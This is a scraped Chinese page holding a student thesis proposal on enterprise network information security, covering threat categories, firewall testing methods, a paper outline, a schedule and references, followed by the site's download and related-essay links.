小型企业在人员规模、基础建设、资金实力等方面都相对落后于大中型企业,但是在发展阶段的小型企业,对网络、信息的安全问题同样不能忽视,目前各式各样的聊天工具、视频网站、网游、P2P下载等,都会直接影响到员工的工作效率,并且占用了大部分的带宽,使得业务系统和正常的工作无法得到保障,且小型企业一般不会配置专业的网管人员,这就是有的小型企业配置了好的电脑,够用的宽带,但是仍然有大部分员工一直抱怨总是不能上网,或者上网太慢,邮件发不出去等问题。从综合实力来讲,小型企业在网络、信息安全方面的投入会比较有限,建议企业配置中低端的安全设备,防火墙,上网行为管理,以研发和设计为主的企业对于防泄密系统的部署还是有必要的。

第五篇:网络信息的安全与防范论文开题报告

网络信息的安全与防范

201103级 计算机科学与技术 金昌电大 王维晶

一、研究的背景及意义

网络是信息传输、接收、共享的虚拟平台,通过它把各个点、面、体的信息联系到一起,从而实现这些资源的共享。它是人们信息交流、使用的一个工具。随着计算机网络的出现和互联网的飞速发展,企业基于网络的计算机应用也在迅速增加,基于网络信息系统给企业的经营管理带来了更大的经济效益,但随之而来的安全问题也在困扰着用户。近几年,木马、蠕虫的传播使企业的信息安全状况进一步恶化。这都对企业信息安全提出了更高的要求。防火墙技术是近几年发展起来的一种保护计算机网络安全的技术性措施,它实际上是一种访问控制技术,在某个机构的网络和不安全的网络之间设置障碍,阻止对信息资源的非法访问,也可以使用它阻止保密信息从受保护网络上被非法输出。

二、研究方法

(一)针对网络安全的威胁进行归纳,威胁主要来源于以下几个方面:

1、网络黑客的攻击。黑客们使用各种工具入侵计算机系统,窃取重要信息或破坏网络的正常使用,严重的情况下,还可能会导致网络瘫痪。

2、网络病毒的入侵。计算机病毒自出现以来,增长速度惊人,所造成的损失也是不计其数,一旦感染病毒,轻者程序变慢,重者可能造成硬件损坏。此外,木马、流氓软件也对电脑构成了很大的威胁。

3、企业防范不到位。由于网络涉及企业生产经营的许多环节,整个网络要运行很多业务,因此不可避免地有会来自多方面的攻击。

4、信息传输中的隐患。信息在从源端到目的端传输过程中不可避免地要造成一定的信息损耗,或者可能被其他人窃取或修改,破坏了信息的完整性。

5、操作系统和网络协议自身的缺陷。操作系统本身就存在一定的漏洞,导致非法用户未经授权而获得访问权限或提高其访问权限。由于历史原因,有些网络协议在设计时就存在缺陷,比如我们常见的TCP/IP 协议簇,就没有解决好协议的安全问题。

6、内部攻击。由于对企业内部的防范不到位,企业内部员工有意的攻击或无意的误操作也是网络安全问题的隐患。

7、网络设备的威胁。

(二)应该了解网络安全,做好防范措施,做好网络信息的保密性、完整性和可用性。然后具体讲述网络防火墙安全技术的分类及其主要技术特征,防火墙部署原则,并从防火墙部署的位置详细阐述防火墙的选择标准。

1、防火墙测试方法分类

从产品测试的测试技术上分类,防火墙测试可分为两类,一类是从防火墙设计的角度着手的白盒测试,另一类是从防火墙使用的角度着手的黑盒测试。

(1)防火墙的白盒测试。以设计为主要观点的白盒测试,通常强调防火墙系统的整体设计。一个正式的防火墙产品首先应该经过全面的、详细的白盒测试,并且出具完整的测试报告。由于白盒测试要求评测人员必须对防火墙的设计原理及其实现细节有深入的了解,决定了该测试通常只能由生产防火墙的厂商进行这样的测试缺乏应有的透明性和公正性。

(2)防火墙的黑盒测试。以使用为主要观点的黑盒测试则不管防火墙内部系统设计只试图以使用者的角度从外部对防火墙进行攻击,测试防火墙是否能将非法闯入的测试数据包阻挡在外。黑盒测试不要求评测人员对防火墙的细节有深入的了解,只需确定测试的目的,将待测目标网络的信息资料收集齐全,再列出测试的清单,根据清单逐项测试即可。该测试可确认防火墙系统安装和配置的正确性,并侦测出防火墙是否能防御已知的安全漏洞是当前较为通用的手段。

2、现有的防火墙测试方法(1)实用方法

渗透测试是一种针对防火墙安全性的测试手段,它通过构造网络环境,以攻击者的身份对防火墙进行渗透并根据渗透的难易程度评价防火墙的安全性能。该方法是目前使用最广泛的一种防火墙测试方法。

(2)理论方法

提出了一种基于形式化模型的防火墙测试方法,该方法首先分别对防火墙系统的网络环境和安全需求进行建模,然后形式化验证该防火墙系统是否具有某些安全特性,并根据安全需求生成测试例后执行测试。

以上两种方法都属于脱机测试,是借助于静态信息进行的测试,在测试中并没有向实际的网络发送任何的数据包。由于是基于模型进行测试,而模型只是对真实情况的模拟不能完全反映真实情况。因此存在未考虑到测试中的一些关键因素的情况。

三、论文提纲

(一)绪论 引言

(二)分析当前网络安全形势 1.阐述网络安全的必要 2.网络的安全管理

(三)网络拓朴结构的安全设计 1.网络拓扑结构分析 2.网络攻击浅析

(四)采用硬软件防火墙进行网络信息安全防范 1.防火墙技术 2.数据加密技术 3.计算机病毒的防范

(五)总结

四、论文的写作计划

(一)2012年12月20日至2013年1月4日提交开题报告

(二)2013年1月5日至2013年3月5日提交论文初稿

(三)2013年3月6日至2013年3月20日提交论文定稿

(四)2013年3月21日至2013年4月8日提交论文终稿

五、主要参考文献

[1]谢希仁 计算机网络第五版 高等教育出版社 2002 [2]吴冲 计算机网络 清华大学出版2005 [3]程龙 马婷 企业网络安全解决方案[J] 科技风 2009 [4]石亦歌 企业网络安全解决方案[J] 安防科技 2003 [5]雷震甲 网络工程师教程 北京 清华大学出版社 2009

下载企业网络信息安全防御研究开题报告(推荐五篇)word格式文档
下载企业网络信息安全防御研究开题报告(推荐五篇).doc
将本文档下载到自己电脑,方便修改和收藏,请勿使用迅雷等下载。
点此处下载文档

文档为doc格式


声明:本文内容由互联网用户自发贡献自行上传,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任。如果您发现有涉嫌版权的内容,欢迎发送邮件至:645879355@qq.com 进行举报,并提供相关证据,工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。

相关范文推荐

    企业员工激励机制研究——开题报告

    企业员工激励机制研究——开题报告一、 研究意义企业员工激励机制对于发挥员工的积极性和创造性,提升公司的经营效益和运营效率有着至关重要的作用。员工如果能够在工作过程......

    关于网络教学的设计研究开题报告[精选合集]

    关于网络教学的设计研究开题报告随着个人的文明素养不断提升,我们都不可避免地要接触到报告,多数报告都是在事情做完或发生后撰写的。那么你真正懂得怎么写好报告吗?以下是小编......

    关于网络教学的设计研究开题报告

    随着现代信息技术的迅猛发展,网络技术在教育中的应用日益广泛和深入,特别是internet与校园网的接轨,为中小学教育提供了丰富的资源,使网络教学真正成为现实,同时也为中小学教育开......

    财务报表表外信息研究开题报告

    我的论文题目是《财务报告表外信息的披露研究》 社会主义市场经济的不断发展和完善,人们逐渐认识到财务报表的重要性,但是人们开始不满足财务报表本身的信息要求,在基本财务报......

    网络信息安全评估报告

    计算机信息安全评估报告 如何实现如下图所示可用性1.人们通常采用一些技术措施或网络安全设备来实现这些目标。例如: 使用防火墙,把攻击者阻挡在网络外部,让他们“迚不来”。......

    2011年度网络与信息安全情况报告

    2011年网络与信息安全检查情况的报告 2011年,在省政府办公厅和省工信厅的指导下,我局进一步加强了网络信息安全制度建设,不断强化日常检查与防护管理,配备健全了网络信息安全设......

    网络信息安全

    网络信息安全 信息安全是指为建立信息处理系统而采取的技术上和管理上的安全保护,以实现电子信息的保密性、完整性、可用性和可控性。当今信息时代,计算机网络已经成为一种不......

    网络教学开题报告

    网络教学开题报告 网络教学开题报告1 随着现代信息技术的飞速发展,网络技术在教育中的应用越来越广泛和深入,尤其是互联网与校园网的连接,为中小学教育提供了丰富的资源,使网络......